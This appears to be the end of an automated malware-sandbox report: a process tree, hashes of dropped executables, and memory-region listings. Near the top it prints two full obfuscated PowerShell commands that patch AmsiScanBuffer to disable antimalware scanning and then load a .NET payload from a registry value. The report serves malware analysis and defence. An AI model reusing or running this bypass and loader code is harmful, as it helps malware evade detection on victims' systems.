@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VxxkIphsTTc=$igrGdyvNhizGy.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+'a'+''+[Char](110)+'d'+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+'l'+''+'l'+'')));$jJiYHqsXVWFnNA=$aKHAYfPDUVHikP.Invoke($Null,@([Object]$VxxkIphsTTc,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+[Char](76)+''+'i'+'b'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$vcITKgFoyXapFlznV=$aKHAYfPDUVHikP.Invoke($Null,@([Object]$VxxkIphsTTc,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$QcgEgNA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jJiYHqsXVWFnNA,$FmXBwwHHZCkphsEEcDZ).Invoke(''+[Char](97)+''+[Char](109)+'si'+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$FHCEMfqyRaxMICBDJ=$aKHAYfPDUVHikP.Invoke($Null,@([Object]$QcgEgNA,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+'f'+''+'e'+'r')));$NhKerKWLRw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vcITKgFoyXapFlznV,$vFXWgjXzRzgaOfEVHjQnYC).Invoke($FHCEMfqyRaxMICBDJ,[uint32]8,4,[ref]$NhKerKWLRw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$FHCEMfqyRaxMICBDJ,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vcITKgFoyXapFlznV,$vFXWgjXzRzgaOfEVHjQnYC).Invoke($FHCEMfqyRaxMICBDJ,[uint32]8,0x20,[ref]$NhKerKWLRw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+'s'+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                            2⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4248
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              3⤵
                                                                                                                                PID:4764
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HItqDOHPRTSu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QppQaGMaPlbwXZ,[Parameter(Position=1)][Type]$lcaiNUSUwi)$YURccsNaDUE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+'S'+[Char](101)+''+'a'+'l'+[Char](101)+'d,A'+'n'+''+'s'+''+'i'+'C'+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$YURccsNaDUE.DefineConstructor(''+'R'+'T'+'S'+'p'+[Char](101)+''+'c'+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QppQaGMaPlbwXZ).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YURccsNaDUE.DefineMethod('I'+[Char](110)+'vo'+'k'+'e',''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'ySig,'+[Char](78)+'ew'+[Char](83)+'lot'+[Char](44)+''+[Char](86)+''+'i'+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$lcaiNUSUwi,$QppQaGMaPlbwXZ).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+'g'+'ed');Write-Output $YURccsNaDUE.CreateType();}$IFXTLBAyOsrtj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+'e'+'m'+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'eI'+'F'+''+'X'+''+[Char](84)+'L'+'B'+'A'+'y'+''+[Char](79)+''+[Char](115)+''+[Char](114)+'t'+[Char](106)+'');$GbbeNAVqgacOeT=$IFXTLBAyOsrtj.GetMethod(''+[Char](71)+''+[Char](98)+'b'+[Char](101)+'NA'+[Char](86)+''+[Char](113)+''+'g'+''+[Char](97)+''+'c'+''+[Char](79)+''+[Char](101)+''+[Char](84)+'',[Reflection.BindingFlags]''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WyuutVWbIUoxtpjwoTH=HItqDOHPRTSu @([String])([IntPtr]);$fYDKTAtaiWLsAmyrVZGyhJ=HItqDOHPRTSu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LIxEVHNpJIQ=$IFXTLBAyOsrtj.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('ke'+[Char](114)+''+'n'+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lyFTJtAovaEFXM=$GbbeNAVqgacOeT.Invoke($Null,@([Object]$LIxEVHNpJIQ,[Object](''+[Char](76)+'oad'+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$jKVtuZxFRafIDCnJw=$GbbeNAVqgacOeT.Invoke($Null,@([Object]$LIxEVHNpJIQ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+'a'+[Char](108)+'P'+[Char](114)+'ote'+'c'+''+[Char](116)+'')));$HUNdYcb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lyFTJtAovaEFXM,$WyuutVWbIUoxtpjwoTH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$omwaobqrXTUpuDIDb=$GbbeNAVqgacOeT.Invoke($Null,@([Object]$HUNdYcb,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+'a'+'nB'+'u'+'f'+'f'+''+[Char](101)+'r')));$XLutoWXSzp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jKVtuZxFRafIDCnJw,$fYDKTAtaiWLsAmyrVZGyhJ).Invoke($omwaobqrXTUpuDIDb,[uint32]8,4,[ref]$XLutoWXSzp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$omwaobqrXTUpuDIDb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jKVtuZxFRafIDCnJw,$fYDKTAtaiWLsAmyrVZGyhJ).Invoke($omwaobqrXTUpuDIDb,[uint32]8,0x20,[ref]$XLutoWXSzp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'l'+[Char](101)+'r'+[Char](115)+'tag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:4704
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:4684
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                              1⤵
                                                                                                                                PID:1004
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                1⤵
                                                                                                                                  PID:976
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                  1⤵
                                                                                                                                    PID:372
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                    1⤵
                                                                                                                                      PID:4036

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                      MD5

                                                                                                                                      bdb25c22d14ec917e30faf353826c5de

                                                                                                                                      SHA1

                                                                                                                                      6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                                                                                                                      SHA256

                                                                                                                                      e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                                                                                                                      SHA512

                                                                                                                                      b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                      Filesize

                                                                                                                                      53KB

                                                                                                                                      MD5

                                                                                                                                      124edf3ad57549a6e475f3bc4e6cfe51

                                                                                                                                      SHA1

                                                                                                                                      80f5187eeebb4a304e9caa0ce66fcd78c113d634

                                                                                                                                      SHA256

                                                                                                                                      638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

                                                                                                                                      SHA512

                                                                                                                                      b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      19KB

                                                                                                                                      MD5

                                                                                                                                      61159d88eaf0688504ac7068fe64c968

                                                                                                                                      SHA1

                                                                                                                                      085a14bf4cac471cd90e250c8306e46a5fb1d665

                                                                                                                                      SHA256

                                                                                                                                      8345d3fefc69d31cb80c7b53153d4626b4734ef15af4fbec5a24492cf5f742e6

                                                                                                                                      SHA512

                                                                                                                                      f2f4080a85f4271495b78aa35985a404875777bdab14139d74cbc3a50f9a03a02a241cd04524434f78a056b4c56acd4583c6518e04b6bf96d4912ef0238fabb1

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      1KB

                                                                                                                                      MD5

                                                                                                                                      c697637a9b17f577fccd7e83a5495810

                                                                                                                                      SHA1

                                                                                                                                      04e6054584786b88994b0e0a871562227fe2a435

                                                                                                                                      SHA256

                                                                                                                                      54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

                                                                                                                                      SHA512

                                                                                                                                      66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                      MD5

                                                                                                                                      bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                      SHA1

                                                                                                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                      SHA256

                                                                                                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                      SHA512

                                                                                                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                      MD5

                                                                                                                                      bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                      SHA1

                                                                                                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                      SHA256

                                                                                                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                      SHA512

                                                                                                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                      Filesize

                                                                                                                                      3.7MB

                                                                                                                                      MD5

                                                                                                                                      f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                      SHA1

                                                                                                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                      SHA256

                                                                                                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                      SHA512

                                                                                                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                      Filesize

                                                                                                                                      3.7MB

                                                                                                                                      MD5

                                                                                                                                      f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                      SHA1

                                                                                                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                      SHA256

                                                                                                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                      SHA512

                                                                                                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                      MD5

                                                                                                                                      b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                      SHA1

                                                                                                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                      SHA256

                                                                                                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                      SHA512

                                                                                                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                      MD5

                                                                                                                                      b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                      SHA1

                                                                                                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                      SHA256

                                                                                                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                      SHA512

                                                                                                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                    • memory/588-218-0x00007FFC3FC30000-0x00007FFC3FC40000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/644-219-0x00007FFC3FC30000-0x00007FFC3FC40000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/1696-178-0x00000241B4E50000-0x00000241B4E6C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/1696-177-0x00000241B4E00000-0x00000241B4E0A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/1696-176-0x00007FFC612A0000-0x00007FFC61D61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/1696-175-0x00000241B4E10000-0x00000241B4E2C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/1696-179-0x00000241B4E30000-0x00000241B4E3A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/1696-180-0x00000241B4E90000-0x00000241B4EAA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/1696-181-0x00000241B4E40000-0x00000241B4E48000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1696-182-0x00000241B4E70000-0x00000241B4E76000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                    • memory/1696-172-0x00000241B4500000-0x00000241B4522000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/1696-183-0x00000241B4E80000-0x00000241B4E8A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/1696-184-0x00007FFC612A0000-0x00007FFC61D61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2104-197-0x00007FFC612A0000-0x00007FFC61D61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2104-200-0x0000023E39AB9000-0x0000023E39ABF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                    • memory/2104-199-0x00007FFC612A0000-0x00007FFC61D61000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2104-198-0x0000023E39AB9000-0x0000023E39ABF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                    • memory/2580-143-0x00000000057B0000-0x0000000005816000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/2580-155-0x00000000074F0000-0x0000000007512000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/2580-139-0x0000000002890000-0x00000000028C6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      216KB

                                                                                                                                    • memory/2580-140-0x0000000004FA0000-0x00000000055C8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.2MB

                                                                                                                                    • memory/2580-156-0x00000000083E0000-0x0000000008984000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.6MB

                                                                                                                                    • memory/2580-141-0x0000000004E70000-0x0000000004E92000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/2580-154-0x00000000073D0000-0x00000000073D8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/2580-153-0x00000000073E0000-0x00000000073FA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/2580-152-0x0000000007390000-0x000000000739E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      56KB

                                                                                                                                    • memory/2580-151-0x0000000007420000-0x00000000074B6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      600KB

                                                                                                                                    • memory/2580-150-0x00000000071D0000-0x00000000071DA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/2580-149-0x0000000007160000-0x000000000717A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/2580-148-0x00000000077B0000-0x0000000007E2A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.5MB

                                                                                                                                    • memory/2580-147-0x00000000063D0000-0x00000000063EE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/2580-146-0x0000000070760000-0x00000000707AC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/2580-145-0x0000000007040000-0x0000000007072000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      200KB

                                                                                                                                    • memory/2580-144-0x0000000005E40000-0x0000000005E5E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/2580-142-0x00000000055D0000-0x0000000005636000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/3420-204-0x000000000EFF0000-0x000000000F047000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      348KB

                                                                                                                                    • memory/3420-169-0x00000000026F8000-0x0000000002835000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.2MB

                                                                                                                                    • memory/3420-205-0x000000000EFF0000-0x000000000F047000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      348KB

                                                                                                                                    • memory/3420-170-0x00000000021E5000-0x00000000026E9000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.0MB

                                                                                                                                    • memory/3420-215-0x000000000EFE0000-0x000000000EFE6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                    • memory/3420-171-0x00000000026F8000-0x0000000002835000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.2MB

                                                                                                                                    • memory/3420-168-0x00000000021E5000-0x00000000026E9000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.0MB

                                                                                                                                    • memory/4240-164-0x0000000005510000-0x00000000055A2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      584KB

                                                                                                                                    • memory/4240-167-0x0000000005A00000-0x0000000005A0A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/4240-160-0x0000000000AD0000-0x0000000000C3C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                    • memory/4552-208-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      164KB

                                                                                                                                    • memory/4552-212-0x00007FFC7FBB0000-0x00007FFC7FDA5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/4552-213-0x00007FFC7EEE0000-0x00007FFC7EF9E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/4552-211-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      164KB

                                                                                                                                    • memory/4704-203-0x00007FFC61560000-0x00007FFC62021000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/4704-207-0x00007FFC7EEE0000-0x00007FFC7EF9E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/4704-206-0x00007FFC7FBB0000-0x00007FFC7FDA5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/4704-217-0x00007FFC7EEE0000-0x00007FFC7EF9E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/4704-214-0x00007FFC7FBB0000-0x00007FFC7FDA5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/4752-133-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB